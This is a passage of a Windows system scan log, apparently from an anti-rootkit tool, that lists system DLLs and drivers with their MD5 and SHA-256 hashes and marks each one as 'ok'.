12:17:19.0165 0x1aa8 [ 50544D04AD845C43130B70212EC05CCD, B2E6B558DE7D273512226685FF53ED17C9B4BF81B739FBCA5D3FC82DF8D2BCF7 ] C:\Windows\System32\microsoft-windows-kernel-power-events.dll
12:17:19.0166 0x1aa8 C:\Windows\System32\microsoft-windows-kernel-power-events.dll - ok
12:17:19.0169 0x1aa8 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] C:\Windows\System32\drivers\fltMgr.sys
12:17:19.0169 0x1aa8 C:\Windows\System32\drivers\fltMgr.sys - ok
12:17:19.0172 0x1aa8 [ 3CB6A7286422C72C34DAB54A5DFF1A34, 98D21EFFF511E407336A226420701E82554DA01FA05661303836B6860D63749D ] C:\Windows\System32\dui70.dll
12:17:19.0172 0x1aa8 C:\Windows\System32\dui70.dll - ok
12:17:19.0176 0x1aa8 [ B0945E538CF906BBDDC5A11C8EE868CC, 5F3459F6512918835F7C9400905EC7C1FAEAA7114E0D28C522040C359E3B93F7 ] C:\Windows\System32\microsoft-windows-kernel-processor-power-events.dll
12:17:19.0176 0x1aa8 C:\Windows\System32\microsoft-windows-kernel-processor-power-events.dll - ok
12:17:19.0180 0x1aa8 [ A3DB3C17EE6CAE65D53602B4E80BCCBC, D802A7C6161F937DC42A6E45FE1BB2C8272819F92C294C180EBCDF8FF72CBFDC ] C:\Windows\System32\PSHED.DLL
12:17:19.0180 0x1aa8 C:\Windows\System32\PSHED.DLL - ok
12:17:19.0184 0x1aa8 [ 1F4492FE41767CDB8B89D17655847CDD, 184547FAC0C3D7148FAA3F601929A7089DE393BD19929A137DAD743331DD3F77 ] C:\Windows\System32\ntmarta.dll
12:17:19.0184 0x1aa8 C:\Windows\System32\ntmarta.dll - ok
12:17:19.0187 0x1aa8 [ 8CCDE014A4CDF84564E03ACE064CA753, DD663029B2EB7B12FDB00FCE403D8326141E540E3B9CE84CD5871473D3E2E2CF ] C:\Windows\System32\duser.dll
12:17:19.0187 0x1aa8 C:\Windows\System32\duser.dll - ok
12:17:19.0190 0x1aa8 [ D7F1EF374A90709B31591823B002F918, 05FD2837C9B03D14BB2A969C1AD77CAEF047D93DC5D0F6C2ACBF0888E8F7B359 ] C:\Windows\System32\SndVolSSO.dll
12:17:19.0190 0x1aa8 C:\Windows\System32\SndVolSSO.dll - ok
12:17:19.0194 0x1aa8 [ DC220AE6F64819099F7EBD6F137E32E7, B8FE13B859FA83500DD95637FA6D4A5B8392C2A363E41D014D3B5374F636E1DE ] C:\Windows\System32\AudioSes.dll
12:17:19.0194 0x1aa8 C:\Windows\System32\AudioSes.dll - ok
12:17:19.0198 0x1aa8 [ 896F15A6434D93EDB42519D5E18E6B50, 9263F0CEC58D45EBE3FB9C3061FB9392C55A7933B84B4592E6EE13CFC86D5A50 ] C:\Windows\System32\hid.dll
12:17:19.0198 0x1aa8 C:\Windows\System32\hid.dll - ok
12:17:19.0201 0x1aa8 [ DA1B7075260F3872585BFCDD668C648B, 3E10EF6E1A5C341B478322CB78A0AB7BFC70AD8023779B8B4542A7CB4CA756AB ] C:\Windows\System32\dwmapi.dll
12:17:19.0201 0x1aa8 C:\Windows\System32\dwmapi.dll - ok
12:17:19.0205 0x1aa8 [ 6F8B48F3D343E4B186AB6A9E302B7E16, 54DB52FC56509E61DF68BD251B3286E6CBE1A91D9BC4D950940A61FE2DA04DF8 ] C:\Windows\System32\xmllite.dll
12:17:19.0205 0x1aa8 C:\Windows\System32\xmllite.dll - ok
12:17:19.0208 0x1aa8 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] C:\Windows\System32\gpsvc.dll
12:17:19.0209 0x1aa8 C:\Windows\System32\gpsvc.dll - ok
12:17:19.0212 0x1aa8 [ 8560FFFC8EB3A806DCD4F82252CFC8C6, CC27BC092369A89D6147B16568FEDEB68B584D5738CD686C31F7FAE22ED17B3B ] C:\Windows\System32\ksuser.dll
12:17:19.0212 0x1aa8 C:\Windows\System32\ksuser.dll - ok
12:17:19.0216 0x1aa8 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] C:\Windows\System32\themeservice.dll
12:17:19.0216 0x1aa8 C:\Windows\System32\themeservice.dll - ok
12:17:19.0220 0x1aa8 [ 1473768973453DE50DC738C2955FC4DD, 14BC5DA2442CB726ACC1F277DDBECCF5D61E3A0A3E083A55A0BB610191E35220 ] C:\Windows\System32\wdmaud.drv
12:17:19.0220 0x1aa8 C:\Windows\System32\wdmaud.drv - ok
12:17:19.0223 0x1aa8 [ 5EDBB34736DD7AC1A73CF8792A835E10, 15E87C449AAF2095273341DD9355D8DF2690340D1DEFAF0DFF034F1CDF4316F8 ] C:\Windows\System32\AudioEng.dll
12:17:19.0223 0x1aa8 C:\Windows\System32\AudioEng.dll - ok
12:17:19.0226 0x1aa8 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] C:\Windows\System32\es.dll
12:17:19.0226 0x1aa8 C:\Windows\System32\es.dll - ok
12:17:19.0230 0x1aa8 [ C1395286B822E306B4FE1568A8A77813, 0642B6C793BE0EED5E7D1D2533FC5A01417C50040FC60A8E89BD97CE4A119388 ] C:\Windows\System32\AUDIOKSE.dll
12:17:19.0230 0x1aa8 C:\Windows\System32\AUDIOKSE.dll - ok
12:17:19.0234 0x1aa8 [ 1A47D52E303B7543E4E6026595B95422, C577CD3837546A7CED5D2E8E97FA2EDACA133B4A8595770EF96CAE519BFE280F ] C:\Windows\System32\comres.dll
12:17:19.0234 0x1aa8 C:\Windows\System32\comres.dll - ok
12:17:19.0238 0x1aa8 [ A77BE7CB3222B4FB0AC6C71D1C2698D4, 73566223914BF670DF6B5931FA213E546713531B10391ED65B5256BBD7ABDE7F ] C:\Windows\System32\dsrole.dll
12:17:19.0238 0x1aa8 C:\Windows\System32\dsrole.dll - ok
12:17:19.0241 0x1aa8 [ 46BB91A169B9B31FF44EB04C48EC1D41, 8115B533D3A5BE07633FA54FA8847E3DEC00C5BEB193CF2FBE88428D23E2B3D6 ] C:\Windows\System32\nlaapi.dll
12:17:19.0241 0x1aa8 C:\Windows\System32\nlaapi.dll - ok
12:17:19.0245 0x1aa8 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] C:\Windows\System32\Sens.dll
12:17:19.0245 0x1aa8 C:\Windows\System32\Sens.dll - ok
12:17:19.0248 0x1aa8 [ BE097F5BB10F9079FCEB2DC4E7E20F02, 90A88986C8C5F30FB153EC803FEDA6572B2C2630A6C9578FCC017800692694D5 ] C:\Windows\System32\slc.dll
12:17:19.0248 0x1aa8 C:\Windows\System32\slc.dll - ok
12:17:19.0252 0x1aa8 [ AFCA5C1ECEAF948FC815178BC077680E, D052C18EF455E1A272332F2E11FD4F36DA071FAB3B81CA312FB75BF8702ED72D ] C:\Windows\System32\WindowsCodecs.dll
12:17:19.0253 0x1aa8 C:\Windows\System32\WindowsCodecs.dll - ok
12:17:19.0256 0x1aa8 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] C:\Windows\System32\drivers\lltdio.sys
12:17:19.0256 0x1aa8 C:\Windows\System32\drivers\lltdio.sys - ok
12:17:19.0259 0x1aa8 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] C:\Windows\System32\uxsms.dll
12:17:19.0259 0x1aa8 C:\Windows\System32\uxsms.dll - ok
12:17:19.0263 0x1aa8 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] C:\Windows\System32\drivers\nwifi.sys
12:17:19.0263 0x1aa8 C:\Windows\System32\drivers\nwifi.sys - ok
12:17:19.0267 0x1aa8 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] C:\Windows\System32\drivers\ndisuio.sys
12:17:19.0267 0x1aa8 C:\Windows\System32\drivers\ndisuio.sys - ok
12:17:19.0271 0x1aa8 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] C:\Windows\System32\drivers\rspndr.sys
12:17:19.0271 0x1aa8 C:\Windows\System32\drivers\rspndr.sys - ok
12:17:19.0274 0x1aa8 [ 2B81776DA02017A37FE26C662827470E, A656353C50EE08422145D00DB9CFD9F6D3E664753B3C454B171E2A56A8AA94DC ] C:\Windows\System32\IPHLPAPI.DLL
12:17:19.0274 0x1aa8 C:\Windows\System32\IPHLPAPI.DLL - ok
12:17:19.0278 0x1aa8 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] C:\Windows\System32\lmhsvc.dll
12:17:19.0278 0x1aa8 C:\Windows\System32\lmhsvc.dll - ok
12:17:19.0281 0x1aa8 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] C:\Windows\System32\nsisvc.dll
12:17:19.0281 0x1aa8 C:\Windows\System32\nsisvc.dll - ok
12:17:19.0285 0x1aa8 [ CA2A0750ED830678997695FF61B04C30, E84860CD97AA3C4565ABB2D5D406A5C42B1AD2D8BA1B8CF81FE564D91F15F976 ] C:\Windows\System32\midimap.dll
12:17:19.0285 0x1aa8 C:\Windows\System32\midimap.dll - ok
12:17:19.0288 0x1aa8 [ 10AC5CE9F78DC281A1BBD9B8CC587B8A, 72288C0A88916D3C3828DBD948DBDB0928F26106319F8E60102D6C9004514D60 ] C:\Windows\System32\msacm32.dll
12:17:19.0289 0x1aa8 C:\Windows\System32\msacm32.dll - ok
12:17:19.0292 0x1aa8 [ 1B7C3A37362C7B2890168C5FC61C8D9B, 03727930E5BB5F9D91BAB901FC9A2E3B795D68E2AEE6A2CC3477F356C45A9C54 ] C:\Windows\System32\msacm32.drv
12:17:19.0292 0x1aa8 C:\Windows\System32\msacm32.drv - ok
12:17:19.0296 0x1aa8 [ B73A6E4B319AFFE64582AC5C1801BB3F, 274EEA0743DC659180E691654CBB17136E9E9D83B07E302B47EA5B103EA57710 ] C:\Windows\System32\nrpsrv.dll
12:17:19.0296 0x1aa8 C:\Windows\System32\nrpsrv.dll - ok
12:17:19.0299 0x1aa8 [ 4C9210E8F4E052F6A4EB87716DA0C24C, 460F7990BDADB7D58D6DC95B094D30A2EFDC4CEED444B18A2F36E8D9076FB8B9 ] C:\Windows\System32\winnsi.dll
12:17:19.0299 0x1aa8 C:\Windows\System32\winnsi.dll - ok
12:17:19.0303 0x1aa8 [ 3CC16A849E6092E43909F48EF0E60306, 610B576654A69415E4F2FEDB6BA384C77715944E4F89BD2821B311968CA8D810 ] C:\Windows\System32\dhcpcore6.dll
12:17:19.0303 0x1aa8 C:\Windows\System32\dhcpcore6.dll - ok
12:17:19.0307 0x1aa8 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] C:\Windows\System32\dnsrslvr.dll
12:17:19.0307 0x1aa8 C:\Windows\System32\dnsrslvr.dll - ok
12:17:19.0310 0x1aa8 [ F9EC845C5EECF20E9A67F9F805F2EF1F, C3DBA8CF93DBF50954B1BF6D7EF3F6F5DD1A56DC62B7EB2749C54D9B65D9BB43 ] C:\Windows\System32\keyiso.dll
12:17:19.0310 0x1aa8 C:\Windows\System32\keyiso.dll - ok
12:17:19.0313 0x1aa8 [ 87356377F31DA5F20A833811CD59499C, 4FEC1FD3AC4E4E34DCBC0109B248952604F438C84B1604EB9E2359FA721E23C4 ] C:\Windows\System32\eapphost.dll
12:17:19.0314 0x1aa8 C:\Windows\System32\eapphost.dll - ok
12:17:19.0317 0x1aa8 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] C:\Windows\System32\eapsvc.dll
12:17:19.0318 0x1aa8 C:\Windows\System32\eapsvc.dll - ok
12:17:19.0322 0x1aa8 [ D07EB640618F96490DB88C3CE58DB608, 0C553971259632031E6856A94EEB937D571627FC7CF061CCFC040F4BF0CFF259 ] C:\Windows\System32\FWPUCLNT.DLL
12:17:19.0322 0x1aa8 C:\Windows\System32\FWPUCLNT.DLL - ok
12:17:19.0326 0x1aa8 [ 885D0942E0F28DB90919BE3129ECF279, 5A10D90EE656ECE3DCA174D6F924641509819FC20CB6EF46B5E1723E52DE85BE ] C:\Windows\System32\dnsext.dll
12:17:19.0326 0x1aa8 C:\Windows\System32\dnsext.dll - ok
12:17:19.0329 0x1aa8 [ F568F7C08458D69E4FCD8675BBB107E4, A5FA25ECF248999A68CCECFBB508BFA1ADD18A23E20A9A9081A87C41CAAA36C0 ] C:\Windows\System32\dhcpcsvc.dll
12:17:19.0329 0x1aa8 C:\Windows\System32\dhcpcsvc.dll - ok
12:17:19.0333 0x1aa8 [ 3C06D5A929B798D0B13F6481242A0FD2, CE6127A31AB09E21A912CA16E4BDF663E9D05C254CCF9090A8B5A9A2E055EFF3 ] C:\Windows\System32\dhcpcsvc6.dll
12:17:19.0333 0x1aa8 C:\Windows\System32\dhcpcsvc6.dll - ok
12:17:19.0336 0x1aa8 [ 9FCA3A84338ADEF2AFF67CDA46EF8539, 087DF72096852AE98C56990EE6E68835BE95E7E49ECDDE8B54DAC11C9E07FE94 ] C:\Windows\System32\umb.dll
12:17:19.0336 0x1aa8 C:\Windows\System32\umb.dll - ok
12:17:19.0340 0x1aa8 [ A648C4A06DE367065B24056D067B4460, 2412487D65A833DDD9AB17D039515CC08DA22D006259EC4B03E42475FAFFD2AD ] C:\Windows\System32\wlanmsm.dll
12:17:19.0340 0x1aa8 C:\Windows\System32\wlanmsm.dll - ok
12:17:19.0343 0x1aa8 [ 06A1386B6E3A0CBC368665C1840906F4, C10BCA5092A0B3F9435CE4D65C7449528C89F5C5243B410878D2EBF516DA2FB2 ] C:\Windows\System32\wlansec.dll
12:17:19.0343 0x1aa8 C:\Windows\System32\wlansec.dll - ok
12:17:19.0347 0x1aa8 [ 0D753307D274F3688BD21C377B616700, 5DD08E77A11F2561FB96BA212FDDFE21D4394C69C34C3EB88F7F5CD068EE55BF ] C:\Windows\System32\eappcfg.dll
12:17:19.0347 0x1aa8 C:\Windows\System32\eappcfg.dll - ok
12:17:19.0351 0x1aa8 [ 65522E77A1360DBC8D199DA3BF5EFFE4, E9D748070FA478A3D37F15049F998D340885C0DC5FCE03BFCE5D521C9EBA7350 ] C:\Windows\System32\eappprxy.dll
12:17:19.0351 0x1aa8 C:\Windows\System32\eappprxy.dll - ok
12:17:19.0355 0x1aa8 [ 73FCB7919DEE80EE556F2E498594EBAE, D0F7A0AD3BC33263E9C2CF9787DD326436F9E0C9F5031D769F8A43C64C08A762 ] C:\Windows\System32\onex.dll
12:17:19.0355 0x1aa8 C:\Windows\System32\onex.dll - ok
12:17:19.0358 0x1aa8 [ 97E43F324BE1503CB2FFB058534688DA, 50C781DF38D0D38C9A5420AB1FFF8672DC13FD1ED8E9F5432B4BA3077A7435D5 ] C:\Windows\System32\l2gpstore.dll
12:17:19.0358 0x1aa8 C:\Windows\System32\l2gpstore.dll - ok
12:17:19.0362 0x1aa8 [ 730BF204A595D5B6D7DC57A247CC741C, 264C6901F4A49B738BBD04BCA1783DEE892885BADE9085B0AEA40BAE7CC0A218 ] C:\Windows\System32\wlgpclnt.dll
12:17:19.0362 0x1aa8 C:\Windows\System32\wlgpclnt.dll - ok
12:17:19.0365 0x1aa8 [ A6A53AC6E135976F0726C33894DC737E, 47AD211835BCF3E5FF400694DCFD379714C2A6ED53729B4C9066085DE7596D90 ] C:\Program Files\WIDCOMM\Bluetooth Software\BtwCP.dll
12:17:19.0366 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtwCP.dll - ok
12:17:19.0370 0x1aa8 [ C2762A57DF0EE85E63CE4893C5215313, DDE22212D78353633CEDE27D7210469DE674563991105563CF64CCCE2D0743BD ] C:\Windows\System32\VaultCredProvider.dll
12:17:19.0370 0x1aa8 C:\Windows\System32\VaultCredProvider.dll - ok
12:17:19.0374 0x1aa8 [ 9F2BACD5E1776A4BB7CC0EC3C3A4F96D, 19959D18601712901F03B83150D15E34EBCAB355BB4692C9A28511A72F57FC66 ] C:\Windows\System32\winbrand.dll
12:17:19.0374 0x1aa8 C:\Windows\System32\winbrand.dll - ok
12:17:19.0376 0x1aa8 [ 7D5645EE0EA77D539828433D9B95F5EB, EEF81E9B2205FC456DB6095AD0AEAB38BB131D3BCD090EA6CD91D5568ACAFB7F ] C:\Windows\System32\WinSCard.dll
12:17:19.0376 0x1aa8 C:\Windows\System32\WinSCard.dll - ok
12:17:19.0380 0x1aa8 [ 7F1B4C6FF3B85F9ADF74055187B8A22C, CC95DA5662638AACBE9643DCB236464C2C2095A8D5CDC8A747045870BE9D0E7D ] C:\Windows\System32\wlanutil.dll
12:17:19.0380 0x1aa8 C:\Windows\System32\wlanutil.dll - ok
12:17:19.0383 0x1aa8 [ 99B91C5D2FCEF218CAD3600ECB62A799, E28F2903F86D39C5A69B5F89CCD6594E93A1BF1E4ACD613A0F2E2348DFA88D65 ] C:\Windows\System32\msxml6.dll
12:17:19.0384 0x1aa8 C:\Windows\System32\msxml6.dll - ok
12:17:19.0387 0x1aa8 [ 0015ACFBBDD164A8A730009908868CA7, E1FF243AD2CF959FAB81EFE701592414991C03416FF296ADC93906E76B707C4D ] C:\Windows\System32\winspool.drv
12:17:19.0387 0x1aa8 C:\Windows\System32\winspool.drv - ok
12:17:19.0391 0x1aa8 [ 8563BA40DF4F1E93A61B70E2C8B60CF8, E5CAA520CBE61FAF3EAA784A51ED30E0CB2FD78EFD8AE1D5C6B0FE43A1009F39 ] C:\Windows\System32\SmartcardCredentialProvider.dll
12:17:19.0391 0x1aa8 C:\Windows\System32\SmartcardCredentialProvider.dll - ok
12:17:19.0394 0x1aa8 [ BF352E73615F5461AA6884472435A544, 4B059E79325C5F08CD6FBBE6352E17ADB64B9608CC9EDB36A2DF4D148060C309 ] C:\Windows\System32\BioCredProv.dll
12:17:19.0394 0x1aa8 C:\Windows\System32\BioCredProv.dll - ok
12:17:19.0398 0x1aa8 [ EEEA40F0EDB0A6E5359E539E15D0BC77, BFCBF777239C29C6AC4BC5B59591308571647B7C7FDB5571903F7403DD241E8E ] C:\Windows\System32\netapi32.dll
12:17:19.0398 0x1aa8 C:\Windows\System32\netapi32.dll - ok
12:17:19.0401 0x1aa8 [ 6CECA4C6A489C9B2E6073AFDAAE3F607, 127506D1DB38275614CBEB047C133718EF9D03266BA9C98BE55EC7847CFC9C3D ] C:\Windows\System32\netutils.dll
12:17:19.0401 0x1aa8 C:\Windows\System32\netutils.dll - ok
12:17:19.0405 0x1aa8 [ 44B9C66177651F3F53C87B665D58D17A, 3FC426115FF87570889DB28D71970B82B525D2A4B9A00EDD273BF083B77A05CE ] C:\Windows\System32\vaultcli.dll
12:17:19.0406 0x1aa8 C:\Windows\System32\vaultcli.dll - ok
12:17:19.0409 0x1aa8 [ 796B8123A7859AFD3A4AE10514DBAEB5, E76F69FAFEC3D66263ED95F3FA9EE309BDDACB287E30583A147DC97F6EEB8844 ] C:\Windows\System32\winbio.dll
12:17:19.0409 0x1aa8 C:\Windows\System32\winbio.dll - ok
12:17:19.0412 0x1aa8 [ 3C91392D448F6E5D525A85B7550D8BA9, 6FD0DC73DBE7519E2C643554C2A7F8FBE4F9A678C4241BB54B3C6E65D2ABCF3A ] C:\Windows\System32\wkscli.dll
12:17:19.0413 0x1aa8 C:\Windows\System32\wkscli.dll - ok
12:17:19.0416 0x1aa8 [ FC51229C7D4AFA0D6F186133728B95AB, 37E58C8E1C8437D1981725A5DCDACA7316CEFBB570370CEFC8D122F523B96AC0 ] C:\Windows\System32\samcli.dll
12:17:19.0416 0x1aa8 C:\Windows\System32\samcli.dll - ok
12:17:19.0419 0x1aa8 [ 032229246107C5C7211E6D1498B52D3D, 8B492A0621BA88EBF3ABFC072C9023B2162C59AA6E9C61DA6D4762DB6C6C7B4A ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL
12:17:19.0419 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL - ok
12:17:19.0424 0x1aa8 [ 972C3301DB3DA91AE06A95F6B4160B1B, 678B533A06C306295FE97DC26CE9BAFFC8EAF1FB7405ACB040719099717744D5 ] C:\Windows\System32\certCredProvider.dll
12:17:19.0424 0x1aa8 C:\Windows\System32\certCredProvider.dll - ok
12:17:19.0427 0x1aa8 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] C:\Windows\System32\shsvcs.dll
12:17:19.0427 0x1aa8 C:\Windows\System32\shsvcs.dll - ok
12:17:19.0431 0x1aa8 [ 87FA0C48C3B2E9FEE518818FE26B15B5, DA4042DE9897397AEDCEFF9F69746726237305DDE64464309B6DCC45E05E42F4 ] C:\Windows\System32\rasplap.dll
12:17:19.0431 0x1aa8 C:\Windows\System32\rasplap.dll - ok
12:17:19.0434 0x1aa8 [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] C:\Windows\System32\schedsvc.dll
12:17:19.0434 0x1aa8 C:\Windows\System32\schedsvc.dll - ok
12:17:19.0438 0x1aa8 [ 43FAB56AE5F639AD59D7209693F4C4C2, C64155944DA774A80D443A0E6DCC40A3405D9C69CA3EBC95CA46BFD65C7A4908 ] C:\Windows\System32\wlanext.exe
12:17:19.0438 0x1aa8 C:\Windows\System32\wlanext.exe - ok
12:17:19.0442 0x1aa8 [ BF95EA5809E3BBF55370F7CB309FEBD0, 62ADBA6E1A7DDDEFA971580161F30896DFFC27EB4EB82E3CC72062D57DA66500 ] C:\Windows\System32\conhost.exe
12:17:19.0442 0x1aa8 C:\Windows\System32\conhost.exe - ok
12:17:19.0446 0x1aa8 [ 019CD868461B646E09BDF04474C19341, 01837EFACB02E52BC6E90C90C4CB01B11D56E449A37EA4FC2695507FF85EA9FE ] C:\Windows\System32\rasapi32.dll
12:17:19.0446 0x1aa8 C:\Windows\System32\rasapi32.dll - ok
12:17:19.0450 0x1aa8 [ B28DEEC597C8DEB70C744C7CF9210E3E, E777F192D822990CA6301B3FEA2AEA213FA7901438EB3328914ADF02B6C39DB9 ] C:\Windows\System32\rasman.dll
12:17:19.0450 0x1aa8 C:\Windows\System32\rasman.dll - ok
12:17:19.0453 0x1aa8 [ B53C4B69B695EDA1B7E41D35CA4244E2, 3D98E9B263CADA576E4057E059AFC867F6E3F1001F3B73C8BCF9066763A45D9D ] C:\Windows\System32\rtutils.dll
12:17:19.0453 0x1aa8 C:\Windows\System32\rtutils.dll - ok
12:17:19.0457 0x1aa8 [ 8CE11C170E966001D5BEAF3487524958, 1FFDA2A3B0B175E824A2A156C5D08A36F13C149FBA94FCB3F524391DB8E6B087 ] C:\Windows\System32\bcmihvsrv64.dll
12:17:19.0457 0x1aa8 C:\Windows\System32\bcmihvsrv64.dll - ok
12:17:19.0460 0x1aa8 [ BC414631876B2F28B8DAB08E849C12C5, 5973654AA3E90E6B699B0A43F645B893D95BAA803129B6967D746C8239AB26E3 ] C:\Windows\System32\ktmw32.dll
12:17:19.0460 0x1aa8 C:\Windows\System32\ktmw32.dll - ok
12:17:19.0464 0x1aa8 [ 3451FD4CF84C755FF24DC868D6D12156, 848AD01E65F0D8DD3CB4B962FC283E268EA75E7427A013CE49F0AC98568CD446 ] C:\Windows\System32\stapo64.dll
12:17:19.0464 0x1aa8 C:\Windows\System32\stapo64.dll - ok
12:17:19.0468 0x1aa8 [ 9BC8610C32C96A2983A65DC21CAFA921, 2A4195F663C9D55939E3D8FEAA208090FDB0B8801A60164A7325B53104797CBC ] C:\Windows\System32\UXInit.dll
12:17:19.0468 0x1aa8 C:\Windows\System32\UXInit.dll - ok
12:17:19.0471 0x1aa8 [ 945E54F23C72D37B8CD1987AF0DB63BF, C2B217C94DBCA0A31ED834B9D492B53B25B235DDD02B1D1200E76609D32772EA ] C:\Windows\System32\fveapi.dll
12:17:19.0471 0x1aa8 C:\Windows\System32\fveapi.dll - ok
12:17:19.0475 0x1aa8 [ CF636C92B762B26F0B39B38E92380A09, F7B8B0EA4536CE3BA33EE1BD0783F6AAD8C0EF69714E874D4A30B720A04C7A18 ] C:\Windows\System32\oleacc.dll
12:17:19.0476 0x1aa8 C:\Windows\System32\oleacc.dll - ok
12:17:19.0479 0x1aa8 [ 019BDD35DE269CB98B22DE8923C2AA3B, 68B216D5331B128CF1BCB3A3F82FD85B119FFDBCB796C907461CDD6248995817 ] C:\Windows\System32\UIAutomationCore.dll
12:17:19.0479 0x1aa8 C:\Windows\System32\UIAutomationCore.dll - ok
12:17:19.0482 0x1aa8 [ 891ECFD08E2C538B7948CBC45106D697, 628D0D618FF3A70E9FBE3B2C7206C9365ED2297784A5F10FFA05BD2C56657013 ] C:\Windows\System32\fvecerts.dll
12:17:19.0482 0x1aa8 C:\Windows\System32\fvecerts.dll - ok
12:17:19.0486 0x1aa8 [ 694865362F0965779F92BCFE97712323, 825EB75E37AFE9B738869FB5D95020D4F44AD419C2F6C5A658F82A5242FDEF6C ] C:\Windows\System32\tbs.dll
12:17:19.0486 0x1aa8 C:\Windows\System32\tbs.dll - ok
12:17:19.0490 0x1aa8 [ 6DC4A7242F565C9E9C9CCC7BB0FA75C7, 4BC5A1279885EEFBEB27333AF719622A5FCDD9606697692C1978E434CE264D80 ] C:\Windows\System32\taskcomp.dll
12:17:19.0491 0x1aa8 C:\Windows\System32\taskcomp.dll - ok
12:17:19.0495 0x1aa8 [ B90443404596E62B2E60A9EEA5FAF5CA, 4CA41621C448EE43010387EF2DF4EB960822133747D39D6A50709C3AB5B7BC58 ] C:\Windows\System32\EED64A.dll
12:17:19.0495 0x1aa8 C:\Windows\System32\EED64A.dll - ok
12:17:19.0498 0x1aa8 [ E0B4052B55114ACD0BFE627AE050E751, 7FC7D53EE66E0D5FAC48DA227A148C80FEE39803D749B2E12578B11DC9DCC6FA ] C:\Windows\System32\EEL64A.dll
12:17:19.0498 0x1aa8 C:\Windows\System32\EEL64A.dll - ok
12:17:19.0502 0x1aa8 [ 8269210DAF3B12BC8300631B28A2A442, EABEB792C2EA8D4A1A7B13281CF557C194D5667AE0BA2A2D5664908D8269113D ] C:\Windows\System32\wiarpc.dll
12:17:19.0502 0x1aa8 C:\Windows\System32\wiarpc.dll - ok
12:17:19.0505 0x1aa8 [ 357BE883C5236BFC7341CB9E82308908, 4DDB697FD9B7C516CF99D73C8799EA35BB97E2431216CD7C1045F17B06109FBF ] C:\Windows\System32\wlanapi.dll
12:17:19.0505 0x1aa8 C:\Windows\System32\wlanapi.dll - ok
12:17:19.0509 0x1aa8 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] C:\Windows\System32\drivers\http.sys
12:17:19.0509 0x1aa8 C:\Windows\System32\drivers\http.sys - ok
12:17:19.0513 0x1aa8 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] C:\Windows\System32\spoolsv.exe
12:17:19.0513 0x1aa8 C:\Windows\System32\spoolsv.exe - ok
12:17:19.0517 0x1aa8 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] C:\Windows\System32\BFE.DLL
12:17:19.0517 0x1aa8 C:\Windows\System32\BFE.DLL - ok
12:17:19.0520 0x1aa8 [ 5AA945234E9D4CCE4F715276B9AA712C, 65165BD131056816F009D987FC78AC86FFE0C3C38A27E73F873586B7FF4D59CF ] C:\Windows\System32\imageres.dll
12:17:19.0520 0x1aa8 C:\Windows\System32\imageres.dll - ok
12:17:19.0524 0x1aa8 [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] C:\Windows\System32\drivers\bowser.sys
12:17:19.0524 0x1aa8 C:\Windows\System32\drivers\bowser.sys - ok
12:17:19.0528 0x1aa8 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] C:\Windows\System32\drivers\mpsdrv.sys
12:17:19.0529 0x1aa8 C:\Windows\System32\drivers\mpsdrv.sys - ok
12:17:19.0533 0x1aa8 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] C:\Windows\System32\drivers\mrxsmb.sys
12:17:19.0533 0x1aa8 C:\Windows\System32\drivers\mrxsmb.sys - ok
12:17:19.0538 0x1aa8 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] C:\Windows\System32\drivers\mrxsmb10.sys
12:17:19.0538 0x1aa8 C:\Windows\System32\drivers\mrxsmb10.sys - ok
